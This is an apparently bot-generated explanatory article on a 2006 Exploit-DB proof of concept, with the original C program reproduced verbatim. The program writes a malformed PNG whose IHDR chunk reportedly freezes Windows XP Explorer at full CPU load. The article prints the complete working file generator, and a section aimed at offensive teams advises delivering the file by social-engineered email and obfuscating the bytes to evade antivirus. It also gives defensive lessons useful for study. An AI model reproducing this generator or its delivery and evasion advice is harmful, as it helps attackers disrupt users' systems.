By exploitdb papers bot•August 18, 2006•
papers
Understanding the Windows '.png' IHDR Block Denial of Service Exploit
Understanding the Windows '.png' IHDR Block Denial of Service Exploit
What this paper is
This paper details a Proof-of-Concept (PoC) exploit for a Denial of Service (DoS) vulnerability in Microsoft Windows related to the processing of PNG image files. Specifically, it targets how Windows handles the IHDR (Image Header) chunk within a PNG file. When a specially crafted PNG file is processed by a vulnerable Windows component, it can lead to a 100% CPU utilization, effectively freezing the system until the affected process is restarted.
Simple technical breakdown
The core of this exploit lies in crafting a malformed PNG file. PNG files are structured into "chunks," each with a type and data. The IHDR chunk is crucial as it defines the image's properties. This exploit creates a PNG file where the IHDR chunk's data is excessively large or malformed in a way that causes the image processing library within Windows to enter an infinite loop or consume all available CPU resources while trying to parse it. The provided C code generates this malicious PNG file.
Complete code and payload walkthrough
The C code provided is a simple program designed to create a malicious PNG file. Let's break it down:
1. Includes and Defines:
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define PNG_NAME "bla.png"windows.h: Provides Windows-specific API functions.stdio.h: Standard input/output functions, used here for file operations (fopen,fputc,fclose).conio.h: Console input/output functions, used forgetch()to pause execution.PNG_NAME: A macro defining the name of the output file as "bla.png".
2. The shellcode Array:
char shellcode[] =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52"
// ... (a very large array of hexadecimal bytes) ...
"\x0e\xba\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\x00";- This
chararray contains the raw bytes that will form the content of thebla.pngfile. - Crucially, this is NOT traditional "shellcode" in the sense of executable code to be run by the CPU. Instead, these bytes represent the entire structure of a malformed PNG file, including the PNG signature, the
IHDRchunk with malformed data, and other PNG chunks, ending with theIEND(Image End) chunk. - The initial bytes
\x89\x50\x4e\x47\x0d\x0a\x1a\x0aare the standard PNG file signature. - The bytes
\x00\x00\x00\x0d\x49\x48\x44\x52represent a chunk header:\x00\x00\x00\x0d: The length of the chunk data (13 bytes).\x49\x48\x44\x52: The chunk type, which isIHDR.
- The data following
IHDRis where the vulnerability is exploited. The specific values here are designed to trigger the DoS. The exact nature of the malformation (e.g., excessively large dimensions, invalid bit depth, etc.) is encoded within these bytes and is what causes the vulnerable image parsing code to fail catastrophically. - The final bytes
\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\x00represent theIENDchunk, marking the end of the PNG file.
3. The main Function:
int main() {
FILE *File; // File pointer for the output file
int i = 0; // Loop counter
// Attempt to open the file in binary write mode
if((File=fopen(PNG_NAME,"wb")) == NULL) {
printf("Unable to create file %s", PNG_NAME);
getch(); // Wait for a key press
exit(0); // Exit the program
}
printf("Creating PNG file\n"); // Inform the user
// Loop through each byte in the shellcode array and write it to the file
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],File);
fclose(File); // Close the file
printf("PNG file %s successfully created..\n", PNG_NAME); // Success message
getch(); // Wait for a key press before exiting
return 0; // Indicate successful execution
}- File Creation: The code attempts to open a file named "bla.png" in binary write mode (
"wb"). If it fails, it prints an error and exits. - Data Writing: It then iterates through the
shellcodearray (which, as explained, contains the malformed PNG data) and writes each byte to the opened file usingfputc. The loop runs up tosizeof(shellcode)-1to exclude the null terminator if it were present, though for raw byte arrays, this is standard practice to ensure all intended bytes are written. - File Closing: After writing all the data, the file is closed using
fclose. - User Feedback: The program provides messages to the user indicating the creation process and success.
getch()is used to pause the program, waiting for user input before exiting, allowing the user to see the output.
Mapping of Code Fragments to Practical Purpose:
#include <windows.h>: Enables interaction with the Windows OS for file operations.#define PNG_NAME "bla.png": Defines the target filename for the malicious artifact.char shellcode[] = { ... };: Contains the raw bytes constituting the malformed PNG file. This is the "payload" in the sense that it's the data designed to trigger the vulnerability.FILE *File;: A handle to the file being created.fopen(PNG_NAME, "wb"): Opens the file for writing binary data. This is the first step in creating the exploit artifact.for(i=0;i<sizeof(shellcode)-1;i++) fputc(shellcode[i],File);: This loop is the core of the artifact generation. It writes the malformed PNG data byte-by-byte into the file.fclose(File);: Finalizes the file creation.printf(...)andgetch(): Provide user feedback and control program flow for interactive execution.
Practical details for offensive operations teams
- Required Access Level: This exploit requires the ability to write a file to a location accessible by the target user. It does not require elevated privileges to create the file, but the vulnerability itself would be triggered when the file is opened or processed by a vulnerable application or system component.
- Lab Preconditions:
- A Windows environment (XP SP2 is specified in the original paper, but older or potentially some newer versions might be susceptible depending on image handling libraries).
- A C compiler (like Visual Studio 6, as mentioned in the paper) to compile the PoC code.
- A method to deliver the
bla.pngfile to the target system.
- Tooling Assumptions:
- A standard C compiler.
- Basic file system access.
- A mechanism for file transfer (e.g., email, network share, USB drive).
- Execution Pitfalls:
- Antivirus/EDR: Modern security solutions might detect the creation of unusual file types or the specific byte patterns within the
shellcodearray as malicious. - File Type Association/Processing: The DoS is triggered when the PNG file is processed. This typically happens when a user opens the file in an image viewer, or if it's displayed in a web browser, email client, or any application that previews images. Simply placing the file on disk might not trigger the vulnerability.
- Vulnerability Patching: Windows systems are patched over time. The specific vulnerability targeted by this exploit is likely patched in modern operating systems. The PoC is primarily for historical analysis and understanding.
- System Stability: Executing this on a live, unpatched system can cause a complete system freeze, requiring a hard reboot. This is a DoS, not a remote code execution exploit.
- False Positives: The
shellcodearray is very large. If not compiled correctly or if there are copy-paste errors, the resulting file might be invalid and not trigger the DoS, leading to debugging challenges.
- Antivirus/EDR: Modern security solutions might detect the creation of unusual file types or the specific byte patterns within the
- Tradecraft Considerations:
- Delivery: The primary challenge is getting the user to open or process the
bla.pngfile. Social engineering would be key. For example, sending it as an email attachment with a convincing story. - Obfuscation: While the C code itself is simple, the raw byte array is large and could be a signature for AV. Techniques like base64 encoding the bytes and then decoding them in a separate loader could be considered, though this adds complexity.
- Targeted Environment: This exploit is highly dependent on the specific Windows version and installed image processing libraries. Reconnaissance would be crucial to confirm the target's vulnerability.
- Delivery: The primary challenge is getting the user to open or process the
Where this was used and when
- Approximate Year: The exploit was published in 2006.
- Usage Context: This type of exploit would have been used in scenarios where an attacker wanted to disrupt a specific user's system or a network of vulnerable systems. It's a classic example of a DoS attack that doesn't aim for data theft or control, but rather for disruption and incapacitation. It's unlikely to have seen widespread "use" in sophisticated attacks due to its disruptive nature and lack of persistence or data exfiltration capabilities. Its primary value is in demonstrating a vulnerability.
Defensive lessons for modern teams
- Input Validation is Paramount: This exploit highlights the critical need for robust input validation, especially when processing data from external sources (like files). Image parsers must strictly validate chunk lengths, data types, and values to prevent malformed data from causing crashes or infinite loops.
- Secure Image Parsing Libraries: Rely on well-maintained and security-audited image parsing libraries. Keep them updated to patch known vulnerabilities.
- Process Isolation: Running image processing in isolated processes or sandboxes can limit the impact of a crash. If the image viewer crashes, it shouldn't bring down the entire operating system or other critical services.
- Memory Safety: While this specific exploit is a DoS, many similar vulnerabilities can lead to memory corruption and remote code execution. Employing memory-safe programming practices and tools (like ASan) during development is crucial.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect anomalous file creation patterns, suspicious process behavior (like 100% CPU usage from an unexpected process), and known malicious file signatures, helping to prevent or detect such attacks.
- Patch Management: Regularly applying security patches to operating systems and applications is the most effective defense against known vulnerabilities.
ASCII visual (if applicable)
This exploit doesn't lend itself to a complex architecture diagram. It's a direct interaction between a crafted file and a vulnerable application. However, we can visualize the file creation process:
+-------------------+ +-------------------+ +-------------------+
| C Compiler | --> | Source Code (.c) | --> | Malicious PNG |
| (e.g., VS6) | | | | (bla.png) |
+-------------------+ +-------------------+ +-------------------+
|
| (User opens/processes)
v
+-------------------+
| Vulnerable Windows|
| Image Processing |
| Component |
+-------------------+
|
| (Infinite Loop / High CPU)
v
+-------------------+
| System Hang / DoS |
+-------------------+Source references
- Paper ID: 2210
- Paper Title: Microsoft Windows - '.png' IHDR Block Denial of Service (PoC) (2)
- Author: vegas78
- Published: 2006-08-18
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/2210
- Raw URL: https://www.exploit-db.com/raw/2210
Original Exploit-DB Content (Verbatim)
// Microsoft Windows PNG IHDR block DoS PoC (2)
//
// CPU load goes to 100% until you restart explorer.exe
//
// Bug found by: Preddy (?)
//
// Compiled and tested with Windows XP SP2, Visual studio 6, no psdk
//
// Header: 89 50 4e 47 0d 0a
//
// Greets: scoper, [H]Corny, eleet aka takker01 and [...]
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define PNG_NAME "bla.png"
char shellcode[] =
"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52"
"\x00\x00\xff\xff\x00\x00\xff\xff\x08\x00\x00\x00\x00\xc3\x07\xf1"
"\x5c\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xd6\x02\x0e\x0f\x25\x12"
"\x82\xba\x97\x53\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0a\xf0"
"\x00\x00\x0a\xf0\x01\x42\xac\x34\x98\x00\x00\x00\x04\x67\x41\x4d"
"\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x09\x4d\x49\x44\x41"
"\x54\x78\xda\xcd\x9d\x41\x6c\x1b\x45\x14\x40\x27\xff\x00\x00\x00"
"\xff\x00\xff\x00\x00\x00\x00\xff\xff\x00\xff\x00\xff\xff\xff\xff"
"\xff\xc8\xa8\xbd\x94\x0a\xc9\x2d\x1c\x20\x70\x71\x7a\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x4d\x0e\x75\x55\x55"
"\x4a\x72\x31\x6a\x39\xd8\x85\x83\x5b\x09\xd2\x14\x55\xc8\x2b\xa1"
"\x26\x15\x48\xd8\x16\x12\x69\x00\x01\x2a\x62\x59\xef\x7a\xd7\x5e"
"\x7b\x76\xfe\xff\x33\x63\x36\xff\x14\x7b\xff\xee\x3e\xff\x99\xff"
"\xe7\xcf\xcc\xdf\xcd\x98\xcd\x02\xf9\xe7\xc7\xdf\xd8\x36\x91\xc7"
"\x8c\x9d\xbd\x0f\xc1\x9f\xf6\xf7\xe5\xef\xbe\xf9\x3d\x6e\xb6\x80"
"\xf1\xe9\x97\x5e\x7d\x22\xf8\x64\xbb\xf2\xc7\xd7\xef\x3c\xa1\x70"
"\xc9\x11\xc8\xd8\xfe\x53\x77\x1e\x78\x70\x1e\xe3\x0f\x47\x1f\x8d"
"\x9b\x89\x23\x8f\xbf\xbb\xd5\x63\xfc\xe1\x85\xb8\x71\xf8\xb2\xe3"
"\xe4\x96\xcf\xb8\x5d\x11\x7d\x48\x87\xf1\xef\xd7\xe3\x46\x11\x40"
"\xce\x7b\x8c\xd5\xed\xd8\x17\x7d\xd9\xff\x73\x87\xf1\xdf\xb7\xa3"
"\x8e\x1b\x99\xb8\x09\x9d\xd8\x78\xb1\xc3\x78\x27\x32\xe8\x64\xec"
"\x7a\x36\x6e\x46\x36\x75\xdf\x61\xfc\x30\xf2\x70\xc6\xe9\x0b\x8d"
"\x9c\x11\x2f\xe3\xae\xaa\xcd\xfe\x8c\x76\xea\x8c\x1b\x9d\xe2\xb6"
"\x65\xc1\x66\x5b\x07\x22\x8f\x26\xbd\x30\x6f\x57\x92\x71\x32\xbe"
"\xf0\xa7\x88\xd1\xb4\x7d\x29\x9a\xf1\x31\x1e\xd8\x7a\x08\xa5\x37"
"\x7b\x3d\x3f\xaa\x6e\x99\x2c\xe4\x40\x1d\x81\x1d\x59\xd3\xee\x49"
"\x63\x24\xdd\x32\x5b\x6f\xda\x15\xb1\xca\x81\x2d\x34\xa3\xd3\x2d"
"\xb5\x37\x78\xb6\xee\x3a\xa5\x12\x63\x23\xc4\x68\x37\x0b\x5a\x1b"
"\x3c\x59\xee\xb6\x90\x12\x63\xd9\x1e\x90\xba\x46\x0f\xcf\xfb\xad"
"\xd4\x10\xff\x72\xc0\x67\x36\x07\xbf\x48\xdd\x28\x6a\x32\xa5\x59"
"\x39\x93\xe8\xfe\xb9\x17\x54\x16\xd9\x31\x6b\x0f\x4b\x43\x8b\x29"
"\x33\x7d\xdd\xa8\x29\xee\xe7\x80\x1d\xef\xf1\x0c\xb0\x92\x57\x47"
"\xcc\x5d\x25\xf9\x9f\xc8\x8e\x46\xc3\xe6\x49\x59\xb1\xbd\x8d\x62"
"\xd8\x15\x95\xec\xd8\xae\x72\xbf\x3e\xf1\x95\x5a\xd2\x76\x6e\x96"
"\xa6\x2f\x1e\x67\xd6\xf8\x5f\x9b\x8b\x2a\xed\x5d\x3e\x41\x3d\x43"
"\xd4\xd6\xcc\x68\xda\x11\x52\x91\x6d\x6f\x63\x28\xa0\xa9\xb5\x35"
"\x6b\xaf\x46\x1d\x39\x2c\xdb\xde\xe7\xc8\x56\x04\xda\x9a\x95\x22"
"\x8f\x98\x8b\x70\x2e\xc0\x91\x02\x1d\x11\x68\xeb\xc1\x21\x5b\xd9"
"\xbf\x73\x9c\xcb\x28\xb6\x35\x63\x4b\x82\x63\x27\x56\xa8\xf1\x3c"
"\xf3\x81\x84\x15\x41\x3b\x9a\x22\x43\xda\x4d\x5a\xa7\xe4\xc7\x5b"
"\x65\x3b\x5a\xab\xa2\xa3\x89\xab\xa4\x20\x54\xe2\xd3\xfc\xaa\x68"
"\x47\x96\x14\x1a\xd2\x99\x46\xe0\x3b\x65\x9e\x7f\x05\x30\xef\x01"
"\x19\x87\x13\x34\x59\xcf\x89\xea\x36\x6a\xf9\xa3\xf0\xd2\x81\xd4"
"\x91\x90\x75\x5b\x92\x11\x9e\x73\x59\x17\x00\x85\xd4\x0a\x2a\x89"
"\xc9\xa5\x22\x0e\x80\xdd\x11\xb6\x63\x54\xf6\xd3\x6f\x09\x04\x64"
"\xf4\x55\xca\xea\x76\x64\xed\x37\x5b\x80\x86\x79\x1d\x0e\x94\x73"
"\x91\xbf\x63\x03\x3a\x15\x33\xbf\xbe\x39\x0f\x69\x24\x3e\x87\x20"
"\xcd\xb7\x22\x0f\x6d\x02\xa7\xa2\x18\xd9\xd9\x4b\x90\x86\xb9\x02"
"\x44\xf3\xf7\x12\x91\x87\x40\x46\x44\x7f\xec\x48\x05\xea\x92\xc0"
"\x90\x63\x08\xce\x04\x7e\x1d\x76\x2d\x85\xcd\x59\x90\x46\x62\x51"
"\x74\xaf\x39\xc1\xb1\x7b\x0c\x12\x9c\x1d\x83\x35\x34\x39\x4b\x0a"
"\x43\x03\x70\x67\xb4\x1d\xd9\xcd\xe3\xa0\x4a\xe2\x6a\x24\x64\x5a"
"\x10\x9c\xa0\xa0\x81\xf4\x99\x8e\x5c\x3e\x05\xeb\x2c\x46\xad\x5b"
"\x1d\x12\x9c\xb4\xae\x8f\x91\x9d\x3d\x0f\xaa\x24\x3e\xe6\x87\x20"
"\x23\x2d\x38\x09\x1e\x66\xf0\x8c\xec\xe4\x17\x30\x24\x7f\x58\x1c"
"\x4f\x09\xce\xb9\xad\x93\x91\xcd\xc8\x42\xee\x13\x9d\xb2\xa1\x95"
"\xb1\x3d\x73\x03\xd4\x31\x79\x90\xd3\xa2\x33\x74\xf6\xc7\x0e\xe4"
"\x51\x30\x4c\x32\xb3\x34\x9c\xaa\x1d\x14\x9d\x00\x87\x47\x12\xa3"
"\x03\x09\x5b\x32\x35\x0c\xf9\x94\x40\xdd\xd2\xea\x33\xee\x15\x11"
"\xcd\x7d\xf8\xdc\xe0\x37\xa2\x15\xc6\x5f\xdb\xba\x19\x99\x75\x14"
"\x76\x9c\x13\xc5\xf0\x67\x23\x21\x50\x5e\x63\xa0\x50\x19\x1d\xc7"
"\x01\x93\x20\x36\x1b\x5e\xc2\x98\x10\xe9\x6e\x8c\x80\x91\xb5\x5f"
"\x83\x47\x9c\x0f\x42\xa3\xe2\x1e\x91\xea\xad\x51\x30\x3a\x23\xce"
"\xcb\x90\x7b\x27\x16\xfb\x23\x90\xc8\x8e\x2d\xd8\xad\xa5\x18\xd9"
"\x35\xb0\x53\x26\x4a\xc8\x4b\xad\xc3\xd1\x4c\x8e\x91\x59\x47\x4e"
"\x01\xe9\x4a\xaa\x88\xbb\x52\x0d\xa1\x23\xc7\xe8\xb4\x37\x64\xca"
"\x3e\xbf\x11\x85\x9e\x65\xcc\xcd\x90\x39\x2e\x47\x72\xe2\x39\x6d"
"\x33\xc8\x81\x8a\xd1\x4a\x0d\xf8\x36\xf8\x1c\x97\x23\x0b\xcf\x0b"
"\x1b\x3c\xf1\x91\x3f\xde\x08\xec\x08\xad\x2f\xa8\xda\x91\x75\x76"
"\x31\x44\x0b\x2d\x7e\x97\x8c\x5e\x31\x6a\x22\x16\x0f\x30\xeb\x3d"
"\x62\x49\x8a\x96\xac\xba\x5d\x32\x7a\x52\x59\x41\xdc\x41\x9d\xd1"
"\xa1\x8c\x46\xe8\x76\xc9\x68\x05\xcc\x12\xab\x0e\x46\xc6\x32\x91"
"\x10\xde\xd2\x62\xe4\x61\x8c\x19\x35\x31\x0a\x28\xcb\x42\x46\xd4"
"\x72\xba\x2e\xc6\x68\xca\x9c\x80\x11\x17\xe6\xf5\x31\x3a\x94\x65"
"\x9e\x8f\x77\x3c\x37\xc2\xad\x1a\xb8\xb5\x55\x9d\x8c\x8e\xf7\xf0"
"\x22\x51\x25\x92\x11\x59\x44\xa2\x97\xd1\x99\xcc\x14\x9a\x1c\x14"
"\x7e\x5b\x23\x07\x74\xed\x8c\x4e\x54\xcf\x0f\x8e\x90\x8d\x3c\x37"
"\xce\x23\x5b\x5a\x71\x2c\xe4\x22\x4e\xac\x5f\x18\x18\x20\xcd\x33"
"\xbc\xa9\x42\xeb\x4d\x78\x1e\xe3\xcb\x4e\xb4\x26\x48\x37\xf9\x64"
"\x7a\x7c\x6f\x02\xa9\xfe\xfe\x4d\xfc\xa5\xb5\x30\x1a\x93\xd3\x07"
"\x9f\xc1\xd2\xb9\x72\x6a\x81\xa0\xac\xce\x68\xa6\xd3\xd3\x24\x3e"
"\x47\xce\x9f\x25\xa9\x2b\xfa\x4c\xa6\x02\x6d\x31\x29\xb8\xb4\x2b"
"\x8a\x7e\x6d\xe4\xea\x74\x40\xea\xbe\xb7\x1a\x63\x0e\xdc\x5c\x52"
"\xb7\xa2\x1a\x63\x46\x8e\xb0\x49\x2d\x69\x91\x67\x34\x8a\x52\x84"
"\x41\xde\x4b\x61\x94\xf4\xeb\xe4\x47\x29\xb9\x13\xd9\x93\x12\xe7"
"\x48\xd9\x31\x23\xe1\xcc\xbe\xfc\x4f\x6d\x9d\x53\x40\xb4\x9b\xc4"
"\xa2\x59\x39\xc6\x9c\x02\xa1\x8d\x9b\x0c\x86\x18\x25\x72\x8a\x2c"
"\xbc\x09\x22\x94\x44\x89\x58\x17\x44\xf7\x99\xcc\xc7\xe1\xcf\xd6"
"\xad\x8d\xbd\x93\x24\x0f\x4a\xcd\x9d\xa6\xdd\x92\xda\xd6\x03\x5b"
"\x7f\x4d\xef\x79\x86\x2c\xad\x87\x52\xca\x82\x24\xfa\x63\x38\xa9"
"\x0e\xf6\x31\x4d\xd2\xa8\x58\x27\xdc\x90\xce\x38\x50\xa3\xd3\x1b"
"\xd7\x10\x1b\xb3\x7d\x42\x88\xe4\x64\xc6\xc1\x42\x9a\xbe\x38\x02"
"\x6f\xc3\xf7\x09\x7a\xa6\x20\xe1\xd7\xf3\x03\x99\x62\x5f\x9d\xc1"
"\x75\xd2\x6f\x3d\x46\x50\xa6\x31\x66\x0e\x0f\x7c\x31\x41\x3a\xbd"
"\x4f\x66\x08\xf1\x87\xc6\xf8\xde\xd0\xad\x7a\x7f\x4e\x92\xae\x94"
"\xa2\xa8\x53\xfa\x63\x66\xb8\x63\x05\xa3\x2f\xcd\x67\xc0\xca\xa3"
"\x9e\x10\x7d\x86\xb7\xe0\xd0\x7d\xb0\x26\x49\xcd\x26\x9b\xf8\xf9"
"\x35\x65\x9c\x31\x78\x7b\xbc\x67\x5e\x59\xae\xb1\x7d\xd3\xc7\xa8"
"\xd3\xae\xc4\xe4\x35\xac\x2a\x85\x31\xcd\xe5\x48\x49\x66\x92\xd3"
"\x68\x46\x8a\xcf\x4c\x13\x74\x61\xc1\x47\x1f\x0a\xe3\x3e\x82\x2e"
"\x2c\x7b\xd1\x29\x1a\x85\xf1\x19\xad\x8c\x89\x83\x58\x4d\x0a\x23"
"\xd5\x2d\x00\x19\x1f\x05\xa3\x66\x49\x8f\x82\x11\xae\xba\x22\xc9"
"\x1e\xac\x22\x85\x71\x95\xa0\x8b\x90\x71\x6c\x14\xa7\x30\x22\xb6"
"\xc3\x49\x8c\x58\x45\x0a\x63\x95\xa0\xab\x53\x28\x8c\x35\xcd\x1d"
"\x72\x14\x8c\x6d\xdc\x4e\x2e\x56\xe0\xe7\x0a\x25\x18\x59\x29\x1e"
"\x43\x92\x18\x2d\xb0\x08\x9b\x22\x70\x3d\xb3\x0c\x23\x3b\x0b\x57"
"\x72\x8d\x40\x88\xe3\xcc\x4c\x1c\xad\x4d\xad\x89\x7b\x43\x1f\x24"
"\xa2\x1a\x4e\x8a\x91\x5d\xd3\x07\xb9\x81\x55\x24\xe7\x14\xd7\xde"
"\x40\x54\x36\xa1\x64\x44\x3e\xe3\x42\x22\xaa\x0b\x51\xb2\x31\x3a"
"\x46\x66\xcd\x9c\xd1\xd2\xde\x70\x21\xae\x3c\x23\x6b\x9f\xd6\x61"
"\x4a\x4c\xc5\x9e\x3c\x23\x63\x37\x8f\xcc\x2a\xf7\xca\xcd\x91\xda"
"\xb1\x23\x0b\xcf\xcf\x2a\x36\x38\x3a\xf4\xc8\xcf\x15\xda\x0b\x07"
"\x66\x95\x46\x9d\x1a\x5a\x53\x61\x3e\xd3\x5e\x78\xf6\xe5\x4b\xf2"
"\xc6\x44\x14\xb9\xfa\xa2\xb8\x37\x6c\xe4\xca\x92\x9b\x35\xf8\xf5"
"\x1e\x0d\x35\x1f\x46\x56\x06\x13\x51\xf9\xa8\x91\xb1\x83\x49\xdf"
"\xc7\x46\xef\x10\x6b\xab\x4b\xa1\xaf\xe7\x12\x26\x47\x7a\x18\xd3"
"\xe4\x25\x8c\x56\xed\xff\x66\xa4\xac\xc0\x7b\xb2\x8a\x2f\xef\xd1"
"\xc4\x78\x88\x7c\x46\x89\xa0\xab\x85\xd1\x44\x4f\xf1\x7c\x39\x7f"
"\x99\xa0\xac\xad\x4e\x8a\x22\xd6\x12\x69\x53\x73\x64\x8c\x37\x58"
"\xc4\x1a\xb4\x55\x5d\x5a\x23\x74\xc6\x91\x31\x5a\x4b\x25\x2b\xc9"
"\x1b\xcd\xad\x6a\x89\x50\x68\x36\x3a\xc6\x56\x75\xa9\xc6\x35\x14"
"\xdd\x82\x1a\x19\xad\xf5\x5e\x7c\x6c\x5d\x28\x79\xa9\xe5\xc0\xf2"
"\xa2\x63\xc1\x75\x19\x40\x35\xc6\x0c\x0b\xac\xb2\xdc\xed\x7b\xad"
"\xd5\x52\x60\xc2\xbe\xa1\xa7\xb5\xb9\xb4\x4c\x6f\xe2\x9e\xc8\x8f"
"\xd7\x0d\xbb\xe1\xbf\x3d\xce\x7b\xeb\x5d\xa3\xe0\x16\x53\x9b\x59"
"\xf7\xdb\x82\xbf\xa1\x55\xc9\x2b\xbd\x82\x4a\x29\xa7\xe8\x24\x3b"
"\x3e\x65\xd1\xb6\xeb\x5e\xd5\x42\xa7\xbc\x39\x1b\x30\x36\x8a\xca"
"\xef\x66\x54\x61\xec\x3e\x9a\xee\x15\x54\x18\x79\x77\xb7\xc5\xf4"
"\xaa\x71\xdd\x8d\x4e\x33\x97\x4d\x0e\xf1\x19\x66\x26\x5f\xac\xd7"
"\x29\x65\x71\xca\x76\x74\x6d\xe5\x17\x03\x04\xb5\xd7\x5c\x04\xc3"
"\xcc\x16\x2a\x8d\xae\x06\xa1\xe8\x43\x83\x1d\x3b\x52\xcf\x84\x6b"
"\x21\x87\xf6\x7d\x8d\x64\x3e\xc0\x73\x85\x54\x4f\xa1\x25\xf6\xa4"
"\xae\xb6\xd6\x27\xfa\xd2\xb3\x50\xd8\xe1\x16\xeb\xd6\x28\x97\x97"
"\x67\x0c\x05\xbb\x44\x08\x22\x78\xbe\xd5\x98\x3c\x34\xc5\x29\x26"
"\x6e\xcd\x93\x66\xe7\x0a\x76\xb4\x22\x37\x25\xbd\x03\xc6\x5c\x7a"
"\x82\x93\xfb\x5a\xb7\x6a\x35\xda\x02\xc2\x68\xc6\x6b\xc3\x31\xb2"
"\xb1\x32\x98\x54\xb4\x36\xef\xde\xae\xde\xa3\x2f\x70\x28\x30\x0a"
"\x1e\x4a\x9e\x70\x18\xc7\x43\x73\x1c\xeb\xee\xed\x5b\xb7\xf1\x4b"
"\x13\xba\x18\xd7\xfa\xed\xd4\x0a\xed\xca\xee\xe9\xff\x09\x2a\x78"
"\xca\x8c\x01\xdf\x92\x93\x70\x19\xe9\xb9\x1e\x73\x27\x2f\x6f\x57"
"\xa7\x37\xef\xde\x5b\x5b\x97\x4a\x75\xc2\x22\x1f\xc3\xbb\xaf\xa6"
"\xad\xfb\xa3\x9d\xd1\x7b\xc0\xc3\xab\xa8\xd1\xf3\x3a\x4b\xa5\x71"
"\xc6\x9d\xf8\xd7\xfb\x47\x8c\xa4\x1f\xc6\x0b\x5a\xe8\x34\x30\xb2"
"\x6c\xb3\x3c\x90\xd1\xf8\x15\xd9\x3a\x19\x8f\x3d\x60\x0f\xe8\x73"
"\xe3\x1e\xd2\xf0\x57\x5e\x39\xb1\x4e\xc6\x4f\x6d\x66\x7f\x36\xa6"
"\xf1\x82\xdd\x47\x22\x35\x32\x8e\x7f\xeb\x30\xfe\xb4\x5f\x2b\xa3"
"\x9b\x4b\x4a\xbd\xd2\x90\x2f\xc7\xff\xee\xbc\x2b\x1e\xf1\x42\x19"
"\x9a\x64\xb1\x6f\x3c\x43\xc8\xae\x2f\xdd\xf7\xd9\xdf\xd9\x66\xff"
"\xfd\x21\x24\x53\xf7\x5d\xc6\x7f\x4f\xef\x88\x9b\x24\x52\x76\x5f"
"\xb1\xbd\xff\xaf\xb0\x75\x72\xbb\x42\xee\xfe\xe4\x9f\x2e\xe3\xb6"
"\x85\xf4\x10\xbb\xff\xef\x63\x6b\x7e\x7f\x2c\x8b\x53\x42\x79\x78"
"\xea\x8a\x8b\xd8\x65\xb4\xed\x9f\x2f\x4e\xed\x8a\x1b\x2a\x24\xe3"
"\xc7\x97\xef\x77\xd9\xc6\x82\x57\x77\x6d\xad\xde\xf8\xf2\x97\xb8"
"\xc9\x7c\xd9\xf7\xdc\x8b\x4f\x3f\xec\x7f\x18\xeb\x7f\xbd\xd8\x5f"
"\x0f\xe2\x66\xf3\xe5\x91\xfe\xae\xf7\x1f\x3a\x53\xb1\x09\xdd\xaf"
"\x0e\xba\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82\x00";
int main() {
FILE *File;
int i = 0;
if((File=fopen(PNG_NAME,"wb")) == NULL) {
printf("Unable to create file %s", PNG_NAME);
getch();
exit(0);
}
printf("Creating PNG file\n");
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],File);
fclose(File);
printf("PNG file %s successfully created..\n", PNG_NAME);
getch();
return 0;
}
// milw0rm.com [2006-08-18]